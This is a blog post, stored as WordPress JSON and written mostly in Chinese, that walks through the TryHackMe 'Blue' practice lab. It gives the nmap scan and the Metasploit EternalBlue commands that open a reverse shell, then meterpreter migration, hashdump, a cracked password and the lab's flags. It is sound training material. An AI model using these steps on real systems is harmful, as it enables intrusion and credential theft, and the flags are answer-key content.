{"id":187,"date":"2023-04-21T18:03:32","date_gmt":"2023-04-21T10:03:32","guid":{"rendered":"https:\/\/zysgmzb.club\/?p=187"},"modified":"2023-04-21T18:08:50","modified_gmt":"2023-04-21T10:08:50","slug":"tryhackme%e9%9d%b6%e5%9c%ba%e8%ae%b0%e5%bd%95","status":"publish","type":"post","link":"https:\/\/zysgmzb.club\/index.php\/archives\/187","title":{"rendered":"TryHackMe\u9776\u573a\u8bb0\u5f55&#8211;blue"},"content":{"rendered":"<p>\u83dc\u9e21\u5929\u5929\u770b\u5927\u4f6c\u4eec\u63a8\u8350tryhackme\uff0c\u4e8e\u662f\u5c31\u6765\u8bd5\u8bd5\uff0c\u6b63\u597d\u73b0\u5728\u60f3\u5b66\u5b66\u6e17\u900f\u76f8\u5173\u7684\u77e5\u8bc6\uff0c\u6253\u6253\u9776\u573a\u3002<\/p>\n<p>\u5148\u7b80\u5355\u8fc7\u4e86\u8fc7\u57fa\u7840\u77e5\u8bc6\uff0c\u73b0\u5728\u6765\u5c1d\u8bd5\u6253\u6253\u514d\u8d39\u623f\u95f4<\/p>\n<h2>blue<\/h2>\n<h3>task1<\/h3>\n<p>Scan the machine.<\/p>\n<pre class=\"prettyprint linenums\" ><code>nmap -sV -vv --script vuln 10.10.222.121<\/code><\/pre>\n<p>How many ports are open with a port number under 1000?<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/pic1.imgdb.cn\/item\/644217190d2dde57770a2193.jpg\" alt=\"\" \/><\/p>\n<pre class=\"prettyprint linenums\" ><code>3<\/code><\/pre>\n<p>What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)<\/p>\n<pre class=\"prettyprint linenums\" ><code>ms17-010<\/code><\/pre>\n<h3>task2<\/h3>\n<p>Start <a href=\"https:\/\/tryhackme.com\/module\/metasploit\">Metasploit<\/a><\/p>\n<p>Find the exploitation code we will run against the machine. What is the full path of the code?<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/pic1.imgdb.cn\/item\/644218340d2dde57770baeb9.jpg\" alt=\"\" \/><\/p>\n<pre class=\"prettyprint linenums\" ><code>exploit\/windows\/smb\/ms17_010_eternalblue<\/code><\/pre>\n<p>Show options and set the one required value. What is the name of this value?<\/p>\n<pre class=\"prettyprint linenums\" ><code>RHOSTS<\/code><\/pre>\n<p>With that done, run the exploit!<\/p>\n<pre class=\"prettyprint linenums\" ><code>use exploit\/windows\/smb\/ms17_010_eternalblue\nset payload windows\/x64\/shell\/reverse_tcp\nset rhost 10.10.212.248\nset lhost 10.4.18.43\nrun<\/code><\/pre>\n<p>Confirm that the exploit has run correctly. You may have to press  enter for the DOS shell to appear. Background this shell (CTRL + Z). If  this failed, you may have to reboot the target VM. Try running it again before a reboot of the target.<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/pic1.imgdb.cn\/item\/6442243c0d2dde57771f54a7.jpg\" alt=\"\" \/><\/p>\n<h3>task3<\/h3>\n<p>If you haven't already, background  the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post  module we will use? (Exact path, similar to the exploit we previously  selected) <\/p>\n<pre class=\"prettyprint linenums\" ><code>post\/multi\/manage\/shell_to_meterpreter<\/code><\/pre>\n<p>Select this (use MODULE_PATH). Show options, what option are we required to change?<\/p>\n<p>Set the required option, you may need to list all of the sessions to find your target here. <\/p>\n<p>Run! If this doesn't work, try completing the exploit from the previous task once more.<\/p>\n<p>Once the meterpreter shell conversion completes, select that session for use.<\/p>\n<p>Verify that we have escalated to NT AUTHORITY\\SYSTEM. Run getsystem to  confirm this. Feel free to open a dos shell via the command 'shell' and  run 'whoami'. This should return that we are indeed system. Background  this shell afterwards and select our meterpreter session for usage  again. <\/p>\n<p>List all of the processes running via the 'ps' command. Just because we  are system doesn't mean our process is. Find a process towards the  bottom of this list that is running at NT AUTHORITY\\SYSTEM and write  down the process id (far left column).<\/p>\n<p>Migrate to this process using the 'migrate PROCESS_ID' command where the process id is the one you just wrote down in the previous step. This  may take several attempts, migrating processes is not very stable. If  this fails, you may need to re-run the conversion process or reboot the  machine and start once again. If this happens, try a different process  next time. <\/p>\n<h3>task4<\/h3>\n<p>Within our elevated meterpreter  shell, run the command 'hashdump'. This will dump all of the passwords  on the machine as long as we have the correct privileges to do so. What  is the name of the non-default user? <\/p>\n<p><img decoding=\"async\" src=\"https:\/\/pic1.imgdb.cn\/item\/64425d9a0d2dde57777de114.jpg\" alt=\"\" \/><\/p>\n<pre class=\"prettyprint linenums\" ><code>Jon<\/code><\/pre>\n<p>Copy this password hash to a file and research how to crack it. What is the cracked password?<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/pic1.imgdb.cn\/item\/64425dbc0d2dde57777e1dd6.jpg\" alt=\"\" \/><\/p>\n<pre class=\"prettyprint linenums\" ><code>alqfna22<\/code><\/pre>\n<h3>task5<\/h3>\n<p>Flag1? <em>This flag can be found at the system root.<\/em><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/pic1.imgdb.cn\/item\/64425ddd0d2dde57777e5604.jpg\" alt=\"\" \/><\/p>\n<pre class=\"prettyprint linenums\" ><code>flag{access_the_machine}<\/code><\/pre>\n<p>Flag2? <em>This flag can be found at the location where passwords are stored within Windows.<\/em><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/pic1.imgdb.cn\/item\/64425df80d2dde57777e8277.jpg\" alt=\"\" \/><\/p>\n<pre class=\"prettyprint linenums\" ><code>flag{sam_database_elevated_access}<\/code><\/pre>\n<p>flag3? <em>This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved.<\/em> <\/p>\n<p><img decoding=\"async\" src=\"https:\/\/pic1.imgdb.cn\/item\/64425e0d0d2dde57777ea6aa.jpg\" alt=\"\" \/><\/p>\n<pre class=\"prettyprint linenums\" ><code>flag{admin_documents_can_be_valuable}<\/code><\/pre>\n<blockquote>\n<p>\u8fd9\u4e0d\u662fvip\u4e5f\u592a\u5361\u4e86\u5427(<\/p>\n<\/blockquote>\n","protected":false},"excerpt":{"rendered":"<p>\u83dc\u9e21\u5929\u5929\u770b\u5927\u4f6c\u4eec\u63a8\u8350tryhackme\uff0c\u4e8e\u662f\u5c31\u6765\u8bd5\u8bd5\uff0c\u6b63\u597d\u73b0\u5728\u60f3\u5b66\u5b66\u6e17\u900f\u76f8\u5173\u7684\u77e5\u8bc6\uff0c\u6253\u6253\u9776\u573a\u3002 \u5148\u7b80\u5355\u8fc7\u4e86\u8fc7\u57fa\u7840\u77e5\u8bc6\uff0c\u73b0\u5728\u6765\u5c1d\u8bd5\u6253\u6253\u514d\u8d39\u623f\u95f4 blue task1 Scan the machine. nmap -sV -vv &#8211;script vuln 10.10.222.121 How many ports are open with a port number under 1000? 3 Wh [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-187","post","type-post","status-publish","format-standard","hentry","category-learn"],"_links":{"self":[{"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/posts\/187","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/comments?post=187"}],"version-history":[{"count":3,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/posts\/187\/revisions"}],"predecessor-version":[{"id":190,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/posts\/187\/revisions\/190"}],"wp:attachment":[{"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/media?parent=187"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/categories?post=187"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/tags?post=187"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}